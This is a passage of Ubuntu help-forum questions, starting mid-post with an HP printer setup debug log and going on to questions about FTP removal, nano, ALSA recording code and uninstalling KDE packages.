/usr/share/ppd/hp/hp-fax2-hpcups.ppd.gz hp-setup [ 12560 ] : debug : fax-type=7 hp-setup [ 12560 ] : debug : addprinter ( 'hp_laserjet_m1536dnf_mfp ' , 'hp : /net/hp_laserjet_m1536dnf_mfp ? ip=192.168.1.40 ' , '' , '' , 'lsb/usr/hp/hp-laserjet_m1530_mfp_series-ps.ppd.gz ' , '' ) hp-setup [ 12560 ] : debug : { 'hp : /net/hp_laserjet_m1536dnf_mfp ? ip=192.168.1.40 ' : [ 'hp_laserjet_m1536dnf_mfp ' ] } hp-setup [ 12560 ] : debug : send_message ( ) entered hp-setup [ 12560 ] : debug : send_message ( ) returning hp-setup [ 12560 ] : debug : addprinter ( 'hp_laserjet_m1536dnf_mfp_fax ' , 'hpfax : /net/hp_laserjet_m1536dnf_mfp ? ip=192.168.1.40 ' , '' , '/usr/share/ppd/hp/hp-fax2-hpcups.ppd.gz ' , '' , '' ) hp-setup [ 12560 ] : debug : { 'hpfax : /net/hp_laserjet_m1536dnf_mfp ? ip=192.168.1.40 ' : [ 'hp_laserjet_m1536dnf_mfp_fax ' ] } hp-setup [ 12560 ] : debug : send_message ( ) entered hp-setup [ 12560 ] : debug : send_message ( ) returning hp-setup [ 12560 ] : debug : fax-type=7 hp-setup [ 12560 ] : debug : 0000 : 50 55 54 20 2f 44 65 76 4d 67 6d 74 2f 46 61 78 put /devmgmt/fax hp-setup [ 12560 ] : debug : 0010 : 43 6f 6e 66 69 67 44 79 6e 2e 78 6d 6c 20 48 54 configdyn.xml ht hp-setup [ 12560 ] : debug : 0020 : 54 50 2f 31 2e 31 0d 0a 43 6f 6e 6e 65 63 74 69 tp/1.1..connecti hp-setup [ 12560 ] : debug : 0030 : 6f 6e 3a 20 4b 65 65 70 2d 61 6c 69 76 65 0d 0a on : keep-alive.. hp-setup [ 12560 ] : debug : 0040 : 55 73 65 72 2d 61 67 65 6e 74 3a 20 68 70 6c 69 user-agent : hpli hp-setup [ 12560 ] : debug : 0050 : 70 2f 32 2e 30 0d 0a 48 6f 73 74 3a 20 31 39 32 p/2.0..host : 192 hp-setup [ 12560 ] : debug : 0060 : 2e 31 36 38 2e 31 2e 34 30 0d 0a 43 6f 6e 74 65 .168.1.40..conte hp-setup [ 12560 ] : debug : 0070 : 6e 74 2d 6c 65 6e 67 74 68 3a 20 36 34 35 0d 0a nt-length : 645.. hp-setup [ 12560 ] : debug : 0080 : 0d 0a 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d .. < ? xml version= hp-setup [ 12560 ] : debug : 0090 : 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 `` 1.0 '' encoding= '' hp-setup [ 12560 ] : debug : 00a0 : 55 54 46 2d 38 22 3f 3e 3c 21 2d 2d 53 61 6d 70 utf-8 '' ? > < ! -- samp hp-setup [ 12560 ] : debug : 00b0 : 6c 65 20 58 4d 4c 20 66 69 6c 65 20 67 65 6e 65 le xml file gene hp-setup [ 12560 ] : debug : 00c0 : 72 61 74 65 64 20 62 79 20 58 4d 4c 53 50 59 20 rated by xmlspy hp-setup [ 12560 ] : debug : 00d0 : 76 35 20 72 65 6c 2e 20 34 20 55 20 28 68 74 74 v5 rel . 4 u ( htt hp-setup [ 12560 ] : debug : 00e0 : 70 3a 2f 2f 77 77 77 2e 78 6d 6c 73 70 79 2e 63 p : //www.xmlspy.c hp-setup [ 12560 ] : debug : 00f0 : 6f 6d 29 2d 2d 3e 3c 66 61 78 63 66 67 64 79 6e om ) -- > < faxcfgdyn hp-setup [ 12560 ] : debug : 0100 : 3a 46 61 78 43 6f 6e 66 69 67 44 79 6e 20 78 6d : faxconfigdyn xm hp-setup [ 12560 ] : debug : 0110 : 6c 6e 73 3a 66 61 78 63 66 67 64 79 6e 3d 22 68 lns : faxcfgdyn= '' h hp-setup [ 12560 ] : debug : 0120 : 74 74 70 3a 2f 2f 77 77 77 2e 68 70 2e 63 6f 6d ttp : //www.hp.com hp-setup [ 12560 ] : debug : 0130 : 2f 73 63 68 65 6d 61 73 2f 69 6d 61 67 69 6e 67 /schemas/imaging hp-setup [ 12560 ] : debug : 0140 : 2f 63 6f 6e 2f 6c 65 64 6d 2f 66 61 78 63 6f 6e /con/ledm/faxcon hp-setup [ 12560 ] : debug : 0150 : 66 69 67 64 79 6e 2f 32 30 30 39 2f 30 33 2f 30 figdyn/2009/03/0 hp-setup [ 12560 ] : debug : 0160 : 33 22 20 78 6d 6c 6e 73 3a 64 64 3d 22 68 74 74 3 '' xmlns : dd= '' htt hp-setup [ 12560 ] : debug : 0170 : 70 3a 2f 2f 77 77 77 2e 68 70 2e 63 6f 6d 2f 73 p : //www.hp.com/s hp-setup [ 12560 ] : debug : 0180 : 63 68 65 6d 61 73 2f 69 6d 61 67 69 6e 67 2f 63 chemas/imaging/c hp-setup [ 12560 ] : debug : 0190 : 6f 6e 2f 64 69 63 74 69 6f 6e 61 72 69 65 73 2f on/dictionaries/ hp-setup [ 12560 ] : debug : 01a0 : 31 2e 30 2f 22 20 78 6d 6c 6e 73 3a 66 61 78 3d 1.0/ '' xmlns : fax= hp-setup [ 12560 ] : debug : 01b0 : 22 68 74 74 70 3a 2f 2f 77 77 77 2e 68 70 2e 63 `` http : //www.hp.c hp-setup [ 12560 ] : debug : 01c0 : 6f 6d 2f 73 63 68 65 6d 61 73 2f 69 6d 61 67 69 om/schemas/imagi hp-setup [ 12560 ] : debug : 01d0 : 6e 67 2f 63 6f 6e 2f 66 61 78 2f 32 30 30 38 2f ng/con/fax/2008/ hp-setup [ 12560 ] : debug : 01e0 : 30 36 2f 31 33 22 20 78 6d 6c 6e 73 3a 78 73 69 06/13 '' xmlns : xsi hp-setup [ 12560 ] : debug : 01f0 : 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e = '' http : //www.w3 . hp-setup [ 12560 ] : debug : 0200 : 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 org/2001/xmlsche hp-setup [ 12560 ] : debug : 0210 : 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 73 69 ma-instance '' xsi hp-setup [ 12560 ] : debug : 0220 : 3a 73 63 68 65 6d 61 4c 6f 63 61 74 69 6f 6e 3d : schemalocation= hp-setup [ 12560 ] : debug : 0230 : 22 68 74 74 70 3a 2f 2f 77 77 77 2e 68 70 2e 63 `` http : //www.hp.c hp-setup [ 12560 ] : debug : 0240 : 6f 6d 2f 73 63 68 65 6d 61 73 2f 69 6d 61 67 69 om/schemas/imagi hp-setup [ 12560 ] : debug : 0250 : 6e 67 2f 63 6f 6e 2f 6c 65 64 6d 2f 66 61 78 63 ng/con/ledm/faxc hp-setup [ 12560 ] : debug : 0260 : 6f 6e 66 69 67 64 79 6e 2f 32 30 30 39 2f 30 33 onfigdyn/2009/03 hp-setup [ 12560 ] : debug : 0270 : 2f 30 33 20 2e 2e 2f 73 63 68 65 6d 61 73 2f 46 /03 ../schemas/f hp-setup [ 12560 ] : debug : 0280 : 61 78 43 6f 6e 66 69 67 44 79 6e 2e 78 73 64 22 axconfigdyn.xsd '' hp-setup [ 12560 ] : debug : 0290 : 3e 3c 66 61 78 63 66 67 64 79 6e 3a 53 79 73 74 > < faxcfgdyn : syst hp-setup [ 12560 ] : debug : 02a0 : 65 6d 53 65 74 74 69 6e 67 73 3e 3c 64 64 3a 43 emsettings > < dd : c hp-setup [ 12560 ] : debug : 02b0 : 6f 6d 70 61 6e 79 4e 61 6d 65 3e 48 50 20 46 61 ompanyname > hp fa hp-setup [ 12560 ] : debug : 02c0 : 6b 73 3c 2f 64 64 3a 43 6f 6d 70 61 6e 79 4e 61 ks < /dd : companyna hp-setup [ 12560 ] : debug : 02d0 : 6d 65 3e 3c 2f 66 61 78 63 66 67 64 79 6e 3a 53 me > < /faxcfgdyn : s hp-setup [ 12560 ] : debug : 02e0 : 79 73 74 65 6d 53 65 74 74 69 6e 67 73 3e 3c 2f ystemsettings > < / hp-setup [ 12560 ] : debug : 02f0 : 66 61 78 63 66 67 64 79 6e 3a 46 61 78 43 6f 6e faxcfgdyn : faxcon hp-setup [ 12560 ] : debug : 0300 : 66 69 67 44 79 6e 3e figdyn > hp-setup [ 12560 ] : debug : 0000 : 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d http/1.1 200 ok. hp-setup [ 12560 ] : debug : 0010 : 0a 53 65 72 76 65 72 3a 20 67 53 4f 41 50 2f 32 .server : gsoap/2 hp-setup [ 12560 ] : debug : 0020 : 2e 37 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 .7..content-leng hp-setup [ 12560 ] : debug : 0030 : 74 68 3a 20 30 0d 0a 43 6f 6e 6e 65 63 74 69 6f th : 0..connectio hp-setup [ 12560 ] : debug : 0040 : 6e 3a 20 6b 65 65 70 2d 61 6c 69 76 65 0d 0a 0d n : keep-alive ... hp-setup [ 12560 ] : debug : 0050 : 0a . hp-setup [ 12560 ] : debug : setphonenum : xml value : < ? xml version= '' 1.0 '' encoding= '' utf-8 '' ? > < ! -- sample xml file generated by xmlspy v5 rel . 4 u ( http : //www.xmlspy.com ) -- > < faxcfgdyn : faxconfigdyn xmlns : faxcfgdyn= '' http : //www.hp.com/schemas/imaging/con/ledm/faxconfigdyn/2009/03/03 '' xmlns : dd= '' http : //www.hp.com/schemas/imaging/con/dictionaries/1.0/ '' xmlns : fax= '' http : //www.hp.com/schemas/imaging/con/fax/2008/06/13 '' xmlns : xsi= '' http : //www.w3.org/2001/xmlschema-instance '' xsi : schemalocation= '' http : //www.hp.com/schemas/imaging/con/ledm/faxconfigdyn/2009/03/03 ../schemas/faxconfigdyn.xsd '' > < faxcfgdyn : systemsettings > < dd : phonenumber > < /dd : phonenumber > < /faxcfgdyn : systemsettings > < /faxcfgdyn : faxconfigdyn > hp-setup [ 12560 ] : debug : 0000 : 50 55 54 20 2f 44 65 76 4d 67 6d 74 2f 46 61 78 put /devmgmt/fax hp-setup [ 12560 ] : debug : 0010 : 43 6f 6e 66 69 67 44 79 6e 2e 78 6d 6c 20 48 54 configdyn.xml ht hp-setup [ 12560 ] : debug : 0020 : 54 50 2f 31 2e 31 0d 0a 43 6f 6e 6e 65 63 74 69 tp/1.1..connecti hp-setup [ 12560 ] : debug : 0030 : 6f 6e 3a 20 4b 65 65 70 2d 61 6c 69 76 65 0d 0a on : keep-alive.. hp-setup [ 12560 ] : debug : 0040 : 55 73 65 72 2d 61 67 65 6e 74 3a 20 68 70 6c 69 user-agent : hpli hp-setup [ 12560 ] : debug : 0050 : 70 2f 32 2e 30 0d 0a 48 6f 73 74 3a 20 31 39 32 p/2.0..host : 192 hp-setup [ 12560 ] : debug : 0060 : 2e 31 36 38 2e 31 2e 34 30 0d 0a 43 6f 6e 74 65 .168.1.40..conte hp-setup [ 12560 ] : debug : 0070 : 6e 74 2d 6c 65 6e 67 74 68 3a 20 36 33 38 0d 0a nt-length : 638.. hp-setup [ 12560 ] : debug : 0080 : 0d 0a 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d .. < ? xml version= hp-setup [ 12560 ] : debug : 0090 : 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 `` 1.0 '' encoding= '' hp-setup [ 12560 ] : debug : 00a0 : 55 54 46 2d 38 22 3f 3e 3c 21 2d 2d 53 61 6d 70 utf-8 '' ? > < ! -- samp hp-setup [ 12560 ] : debug : 00b0 : 6c 65 20 58 4d 4c 20 66 69 6c 65 20 67 65 6e 65 le xml file gene hp-setup [ 12560 ] : debug : 00c0 : 72 61 74 65 64 20 62 79 20 58 4d 4c 53 50 59 20 rated by xmlspy hp-setup [ 12560 ] : debug : 00d0 : 76 35 20 72 65 6c 2e 20 34 20 55 20 28 68 74 74 v5 rel . 4 u ( htt hp-setup [ 12560 ] : debug : 00e0 : 70 3a 2f 2f 77 77 77 2e 78 6d 6c 73 70 79 2e 63 p : //www.xmlspy.c hp-setup [ 12560 ] : debug : 00f0 : 6f 6d 29 2d 2d 3e 3c 66 61 78 63 66 67 64 79 6e om ) -- > < faxcfgdyn hp-setup [ 12560 ] : debug : 0100 : 3a 46 61 78 43 6f 6e 66 69 67 44 79 6e 20 78 6d : faxconfigdyn xm hp-setup [ 12560 ] : debug : 0110 : 6c 6e 73 3a 66 61 78 63 66 67 64 79 6e 3d 22 68 lns : faxcfgdyn= '' h hp-setup [ 12560 ] : debug : 0120 : 74 74 70 3a 2f 2f 77 77 77 2e 68 70 2e 63 6f 6d ttp : //www.hp.com hp-setup [ 12560 ] : debug : 0130 : 2f 73 63 68 65 6d 61 73 2f 69 6d 61 67 69 6e 67 /schemas/imaging hp-setup [ 12560 ] : debug : 0140 : 2f 63 6f 6e 2f 6c 65 64 6d 2f 66 61 78 63 6f 6e /con/ledm/faxcon hp-setup [ 12560 ] : debug : 0150 : 66 69 67 64 79 6e 2f 32 30 30 39 2f 30 33 2f 30 figdyn/2009/03/0 hp-setup [ 12560 ] : debug : 0160 : 33 22 20 78 6d 6c 6e 73 3a 64 64 3d 22 68 74 74 3 '' xmlns : dd= '' htt hp-setup [ 12560 ] : debug : 0170 : 70 3a 2f 2f 77 77 77 2e 68 70 2e 63 6f 6d 2f 73 p : //www.hp.com/s hp-setup [ 12560 ] : debug : 0180 : 63 68 65 6d 61 73 2f 69 6d 61 67 69 6e 67 2f 63 chemas/imaging/c hp-setup [ 12560 ] : debug : 0190 : 6f 6e 2f 64 69 63 74 69 6f 6e 61 72 69 65 73 2f on/dictionaries/ hp-setup [ 12560 ] : debug : 01a0 : 31 2e 30 2f 22 20 78 6d 6c 6e 73 3a 66 61 78 3d 1.0/ '' xmlns : fax= hp-setup [ 12560 ] : debug : 01b0 : 22 68 74 74 70 3a 2f 2f 77 77 77 2e 68 70 2e 63 `` http : //www.hp.c hp-setup [ 12560 ] : debug : 01c0 : 6f 6d 2f 73 63 68 65 6d 61 73 2f 69 6d 61 67 69 om/schemas/imagi hp-setup [ 12560 ] : debug : 01d0 : 6e 67 2f 63 6f 6e 2f 66 61 78 2f 32 30 30 38 2f ng/con/fax/2008/ hp-setup [ 12560 ] : debug : 01e0 : 30 36 2f 31 33 22 20 78 6d 6c 6e 73 3a 78 73 69 06/13 '' xmlns : xsi hp-setup [ 12560 ] : debug : 01f0 : 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e = '' http : //www.w3 . hp-setup [ 12560 ] : debug : 0200 : 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 org/2001/xmlsche hp-setup [ 12560 ] : debug : 0210 : 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 73 69 ma-instance '' xsi hp-setup [ 12560 ] : debug : 0220 : 3a 73 63 68 65 6d 61 4c 6f 63 61 74 69 6f 6e 3d : schemalocation= hp-setup [ 12560 ] : debug : 0230 : 22 68 74 74 70 3a 2f 2f 77 77 77 2e 68 70 2e 63 `` http : //www.hp.c hp-setup [ 12560 ] : debug : 0240 : 6f 6d 2f 73 63 68 65 6d 61 73 2f 69 6d 61 67 69 om/schemas/imagi hp-setup [ 12560 ] : debug : 0250 : 6e 67 2f 63 6f 6e 2f 6c 65 64 6d 2f 66 61 78 63 ng/con/ledm/faxc hp-setup [ 12560 ] : debug : 0260 : 6f 6e 66 69 67 64 79 6e 2f 32 30 30 39 2f 30 33 onfigdyn/2009/03 hp-setup [ 12560 ] : debug : 0270 : 2f 30 33 20 2e 2e 2f 73 63 68 65 6d 61 73 2f 46 /03 ../schemas/f hp-setup [ 12560 ] : debug : 0280 : 61 78 43 6f 6e 66 69 67 44 79 6e 2e 78 73 64 22 axconfigdyn.xsd '' hp-setup [ 12560 ] : debug : 0290 : 3e 3c 66 61 78 63 66 67 64 79 6e 3a 53 79 73 74 > < faxcfgdyn : syst hp-setup [ 12560 ] : debug : 02a0 : 65 6d 53 65 74 74 69 6e 67 73 3e 3c 64 64 3a 50 emsettings > < dd : p hp-setup [ 12560 ] : debug : 02b0 : 68 6f 6e 65 4e 75 6d 62 65 72 3e 3c 2f 64 64 3a honenumber > < /dd : hp-setup [ 12560 ] : debug : 02c0 : 50 68 6f 6e 65 4e 75 6d 62 65 72 3e 3c 2f 66 61 phonenumber > < /fa hp-setup [ 12560 ] : debug : 02d0 : 78 63 66 67 64 79 6e 3a 53 79 73 74 65 6d 53 65 xcfgdyn : systemse hp-setup [ 12560 ] : debug : 02e0 : 74 74 69 6e 67 73 3e 3c 2f 66 61 78 63 66 67 64 ttings > < /faxcfgd hp-setup [ 12560 ] : debug : 02f0 : 79 6e 3a 46 61 78 43 6f 6e 66 69 67 44 79 6e 3e yn : faxconfigdyn > hp-setup [ 12560 ] : debug : 0000 : 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d http/1.1 200 ok. hp-setup [ 12560 ] : debug : 0010 : 0a 53 65 72 76 65 72 3a 20 67 53 4f 41 50 2f 32 .server : gsoap/2 hp-setup [ 12560 ] : debug : 0020 : 2e 37 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 .7..content-leng hp-setup [ 12560 ] : debug : 0030 : 74 68 3a 20 30 0d 0a 43 6f 6e 6e 65 63 74 69 6f th : 0..connectio hp-setup [ 12560 ] : debug : 0040 : 6e 3a 20 6b 65 65 70 2d 61 6c 69 76 65 0d 0a 0d n : keep-alive ... hp-setup [ 12560 ] : debug : 0050 : 0a . hp-setup [ 12560 ] : debug : type 'toner ' state 'missingmemory ' ink_type 'k ' ink_level 0 agent_sku = hp-setup [ 12560 ] : debug : { 'kind ' : 4 , 'level ' : 0 , 'level-trigger ' : 0 , 'health ' : 0 , 'agent-sku ' : '' , 'type ' : 1 } done . would you please help me ... thank you so much ... .
477596	how to stop and remove ftp service ?	i want to stop ftp and remove the service on ubuntu 14.04 i tried sudo apt-get remove ftp and checked using command ps aux | grep ftp but the service was still running . please suggest some way to stop it .
477602	streaming issues with all browers	can anyone help with flash problems . i have installed ubuntu and am having flash problems in fullscreen where it judders . i have used multiple browers and still the same . i have also followed instructions on various ways to fix but nothing seems to work . just to add specs here thanks for the help venki on that im using ubuntu 14.04lts processor is intel core 2 cpu6420 @ 2.13ghz x2 graphics intel 945g 64-bit os type
477603	how to save a file using nano	i am trying to install java via the terminal using the guide how to install oracle java jre on ubuntu linux . everything went perfectly fine until `` step 11 : save the /etc/profile file and exit '' : i spent maybe 30 minutes figuring out what ^ means ( apparently ctrl ) , but i can not understand how that guy called the save command where you can choose yes and no . i did try ^o , but i did n't get the same result as he did . how can i fix this problem ?
477609	connect to ftp via nautilus connect to server	i want to connect other ubuntu machines on my network . i use nautilus ftp connection manager for it , but it ended up with connection refused by server error . i install vsftpd but it still shows some error i am using ubunut 12.04lts 64bit .
477610	my launchpad bug was marked as a duplicate of another unrelated bug . what should i do ?	some time ago i reported a bug on launchpad . now another user ( who is not an active member of the package i filed the bug against ) marked this bug as a duplicate to another bug . this is great , as it will prevent my report from expiring but the linked duplicate appears to be only remotely related , and also was marked `` invalid '' . therefore the duplicate state feels not correct and i commented on that . does the duplicate link have any negative effects on resolving the issue ? should i remove the link , or is it better to leave it as it is ? what else can be done in such cases ?
477612	glade ubuntu - transparent button on a background image	i 'm trying to make an ubuntu application . i need to place transparent buttons on specific locations on a background image in glade , such that the image changes on button click . i 've not been able to achieve this so far . my button simply does n't land on the image . further , i also have n't been able to make the button completely transparent ( i.e . it 's visible when pressed ) .
477613	manual package selection in ubuntu server	i 'm installing ubuntu server 13.10 and i need to minimize the installation size and overhead as much as possible using manual package selection could be of a great help but i 'm not sure which are the important packages for the system operation and which are not is there a reference for that ? thank you update 1 -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- - the table in this page https : //help.ubuntu.com/13.10/serverguide/preparing-to-install.html suggests that there is a minimal version of the server
477614	how to unsync two folders ?	i have ubuntu one and dropbox folders synced . now when ubuntu one is shutting down , i want to delete u1 folder so it does not use space unnecessary . the problem is that if i delete u1 folder , dropbox folder will be deleted to , because i do n't know how to unsync them . i synced them using grsync , gui for rsync . i first deleted profiles form grsync , but folders was still synced . then i deleted grsync itself , and .grsync folder from home , and that did not help . what should i do ? is it safe to delete rsync like workaround ? edit : i think i did not explained how dirs are synced . u1 dir is like my working dir , with all sort of projects . db dir is synced with u1 dir in way , that everything i save/delete to/from u1 is saved/deleted to/from db dir . if i make any file in db it will be auto deleted because there is no copy of that file in u1 dir . thanks in advance , and sorry form my english .
477615	ubuntu 14.04 lost permission to root directory	i suddenly can not view the root directory using files - > computer . it says i do n't have permission . ( i used to view it ok ) . in terminal , if i try to delete a file : /var/www/somefile i get : /usr/bin/sudo must be owned by uid 0 and have the setuid bit set
477619	how to reduce cpu temperature ?	i have ubuntu 14.04 and an hp pavilion laptop . when running windows 7 the cpu is slightly hot but not much . but running ubuntu however , it is considerably hotter . i installed tlp and my gfx card drivers ( amd catalyst ) for embedded apu which is a radeon 6480g . since then the temperature has went down to about 60c . is there any way to further reduce the temperature ? in particular i noticed that in windows 7 the fan is running more efficient than on ubuntu . is there any way to speed up the fan ?
477621	cursor themes only work for some applications	trying some x11 cursors from gnome-look.org ( vienna , protozoa , leafm , ecliz ... ) in 14.04 unity . done update-alternatives and chmod 755 . everything is ok , cursor themes are visible in unity-tweak , and i can swap between them . but new cursors work only for some applications , like firefox and libreoffice . it seems unity applications do n't accept the new cursor , and dmz-white remains . curiously , other applications like software center mix both cursor themes ( new cursor theme for links ) . anyway , window bar always force old cursor theme ( dmz-white ) . is it possible to only have the new cursor themes ?
477623	embedded terminal into desktop with devilspie !	i tried to embed a terminal to my desktop using devilspie . my problem is the borders of terminal ! what can i do ? the screenshot is that ; this is the start up command gnome-terminal -- role=borderless -- window-with-profile=desktopconsole and this is ; ( if ( matches ( window_name ) `` desktopconsole '' ) ( begin ( set_workspace 4 ) ( below ) ( undecorate ) ( skip_pager ) ( skip_tasklist ) ( wintype `` utility '' ) ( geometry `` +0+0 '' ) ( geometry `` 400x500 '' ) ) ) desktopconsole.ds config file
477625	how to display the status icon of skype	how do i get the skype status icon on the main bar of ubuntu ? i 've tried to follow this answer , but it would n't work . i do n't have the panel menus . so , i 'm here looking for another way to proceed . any brilliant suggestion , please ? thanks in advance !
477626	alsa prgramming in c	i 'm using a c program that help me recording from my audio device here is the code : /* use the newer alsa api */ # define alsa_pcm_new_hw_params_api # include < alsa/asoundlib.h > int main ( ) { long loops ; int rc ; int size ; snd_pcm_t *handle ; snd_pcm_hw_params_t *params ; unsigned int val ; int dir ; snd_pcm_uframes_t frames ; char *buffer ; /* open pcm device for recording ( capture ) . */ rc = snd_pcm_open ( & handle , `` default '' , snd_pcm_stream_capture , 0 ) ; if ( rc < 0 ) { fprintf ( stderr , `` unable to open pcm device : % s\n '' , snd_strerror ( rc ) ) ; exit ( 1 ) ; } /* allocate a hardware parameters object . */ snd_pcm_hw_params_alloca ( & params ) ; /* fill it in with default values . */ snd_pcm_hw_params_any ( handle , params ) ; /* set the desired hardware parameters . */ /* interleaved mode */ snd_pcm_hw_params_set_access ( handle , params , snd_pcm_access_rw_interleaved ) ; /* signed 16-bit little-endian format */ snd_pcm_hw_params_set_format ( handle , params , snd_pcm_format_s16_le ) ; /* two channels ( stereo ) */ snd_pcm_hw_params_set_channels ( handle , params , 2 ) ; /* 44100 bits/second sampling rate ( cd quality ) */ val = 44100 ; snd_pcm_hw_params_set_rate_near ( handle , params , & val , & dir ) ; /* set period size to 32 frames . */ frames = 32 ; snd_pcm_hw_params_set_period_size_near ( handle , params , & frames , & dir ) ; /* write the parameters to the driver */ rc = snd_pcm_hw_params ( handle , params ) ; if ( rc < 0 ) { fprintf ( stderr , `` unable to set hw parameters : % s\n '' , snd_strerror ( rc ) ) ; exit ( 1 ) ; } /* use a buffer large enough to hold one period */ snd_pcm_hw_params_get_period_size ( params , & frames , & dir ) ; size = frames * 4 ; /* 2 bytes/sample , 2 channels */ buffer = ( char * ) malloc ( size ) ; /* we want to loop for 5 seconds */ snd_pcm_hw_params_get_period_time ( params , & val , & dir ) ; loops = 5000000 / val ; while ( loops > 0 ) { loops -- ; rc = snd_pcm_readi ( handle , buffer , frames ) ; if ( rc == -epipe ) { /* epipe means overrun */ fprintf ( stderr , `` overrun occurred\n '' ) ; snd_pcm_prepare ( handle ) ; } else if ( rc < 0 ) { fprintf ( stderr , `` error from read : % s\n '' , snd_strerror ( rc ) ) ; } else if ( rc ! = ( int ) frames ) { fprintf ( stderr , `` short read , read % d frames\n '' , rc ) ; } rc = write ( 1 , buffer , size ) ; if ( rc ! = size ) fprintf ( stderr , `` short write : wrote % d bytes\n '' , rc ) ; } snd_pcm_drain ( handle ) ; snd_pcm_close ( handle ) ; free ( buffer ) ; return 0 ; } to save the output of the program i have to use : gcc record.c -o out -lasound ./out > sound.raw my problem is the last line , i want to be whithin the program , mean the redirection of the output should n't be done at all , the program runs and save the data ! any idea how can i do that ? thanks in advance for any help !
477627	problems when try to remove kde plasma from ubuntu 14.04	i have some problems when i try to remove kde plasma from ubuntu 14.04 . i installed kde plasma using this command sudo apt-get update sudo apt-get install kubuntu-desktop after doing some changes in kde desktop it was getting a worst and when i switched back to unity everything was messed up including window colours , shadows , menu appearance , font rendering system and pretty much everything . back then i tried to remove it using this command sudo aptitude remove kde-desktop this , sudo apt-get remove kde-full sudo apt-get -- purge autoremove and this sudo apt-get remove akonadi-backend-mysql akonadi-server akregator amarok amarok-common amarok-utils apport-kde apturl-kde ark bluedevil cdparanoia cdrdao cryptsetup docbook-xml docbook-xsl dolphin dragonplayer freespacenotifier gnupg-agent gnupg2 gpgsm gpsd gstreamer0.10-qapt gtk2-engines-oxygen gtk3-engines-oxygen gwenview ibus-qt4 icoutils jockey-kde k3b k3b-data kaccessible kaddressbook kamera kate kate-data katepart kcalc kde-baseapps-bin kde-baseapps-data kde-config-gtk kde-config-touchpad kde-runtime kde-runtime-data kde-style-oxygen kde-wallpapers-default kde-window-manager kde-window-manager-common kde-workspace kde-workspace-bin kde-workspace-data kde-workspace-kgreet-plugins kde-zeroconf kdegames-card-data kdegraphics-strigi-analyzer kdelibs-bin kdelibs5-data kdelibs5-plugins kdemultimedia-kio-plugins kdenetwork-filesharing kdepasswd kdepim-kresources kdepim-runtime kdepim-strigi-plugins kdepimlibs-kio-plugins kdesudo kdm kdoctools khelpcenter4 kinfocenter klipper kmag kmail kmenuedit kmix kmousetool knotes konsole kontact kopete kopete-message-indicator korganizer kpat kppp ksnapshot ksysguard ksysguardd ksystemlog ktimetracker ktorrent ktorrent-data kubuntu-debug-installer kubuntu-default-settings kubuntu-desktop kubuntu-docs kubuntu-firefox-installer kubuntu-netbook-default-settings kubuntu-notification-helper kubuntu-web-shortcuts kvkbd kwalletmanager language-selector-kde libakonadi-calendar4 libakonadi-contact4 libakonadi-kabc4 libakonadi-kcal4 libakonadi-kde4 libakonadi-kmime4 libakonadi-notes4 libakonadiprotocolinternals1 libassuan0 libattica0.3 libbluedevil1 libboost-program-options1.46.1 libcalendarsupport4 libcln6 libclucene0ldbl libdebconf-kde0 libdlrestrictions1 libdmtx0a libencode-locale-perl libepub0 libeventviews4 libfile-listing-perl libflac++6 libfont-afm-perl libgadu3 libgif4 libgpgme++2 libgps20 libgrantlee-core0 libhtml-form-perl libhtml-format-perl libhtml-parser-perl libhtml-tagset-perl libhtml-tree-perl libhttp-cookies-perl libhttp-daemon-perl libhttp-date-perl libhttp-message-perl libhttp-negotiate-perl libibus-qt1 libilmbase6 libincidenceeditorsng4 libindicate-qt1 libio-socket-inet6-perl libio-socket-ssl-perl libk3b6 libkabc4 libkactivities-bin libkactivities6 libkalarmcal2 libkateinterfaces4 libkatepartinterfaces4 libkblog4 libkcal4 libkcalcore4 libkcalutils4 libkcddb4 libkcmutils4 libkde3support4 libkdeclarative5 libkdecorations4 libkdecore5 libkdegames5a libkdepim4 libkdepimdbusinterfaces4 libkdesu5 libkdeui5 libkdewebkit5 libkdgantt2 libkdnssd4 libkemoticons4 libkephal4abi1 libkexiv2-10 libkexiv2-data libkfile4 libkholidays4 libkhtml5 libkidletime4 libkimap4 libkio5 libkipi-data libkipi8 libkjsapi4 libkjsembed4 libkldap4 libkleo4 libkmanagesieve4 libkmbox4 libkmediaplayer4 libkmime4 libknewstuff2-4 libknewstuff3-4 libknotifyconfig4 libkntlm4 libkonq-common libkonq5-templates libkonq5abi1 libkontactinterface4 libkopete4 libkparts4 libkpgp4 libkpimidentities4 libkpimtextedit4 libkpimutils4 libkprintutils4 libkpty4 libkresources4 libkrosscore4 libksba8 libkscreensaver5 libksgrd4 libksieve4 libksieveui4 libksignalplotter4 libktexteditor4 libktnef4 libktorrent-l10n libktorrent3 libkunitconversion4 libkwineffects1abi3 libkwinglutils1 libkwinnvidiahack4 libkworkspace4abi1 libkxmlrpcclient4 liblastfm0 libloudmouth1-0 liblwp-mediatypes-perl liblwp-protocol-https-perl libmailcommon4 libmailtools-perl libmailtransport4 libmessagecomposer4 libmessagecore4 libmessagelist4 libmessageviewer4 libmicroblog4 libmpcdec6 libmsn0.3 libmuonprivate1 libmygpo-qt1 libmysqlclient18 libnepomuk4 libnepomukdatamanagement4 libnepomukquery4a libnepomuksync4 libnepomukutils4 libnet-http-perl libnet-ssleay-perl libntrack-qt4-1 libntrack0 libokularcore1abi1 libopenexr6 libotr2 libphonon4 libplasma-geolocation-interface4 libplasma3 libplasmaclock4abi3 libplasmagenericshell4 libpolkit-qt-1-1 libpoppler-qt4-3 libprison0 libprocesscore4abi1 libprocessui4a libqalculate5 libqapt-runtime libqapt1 libqca2 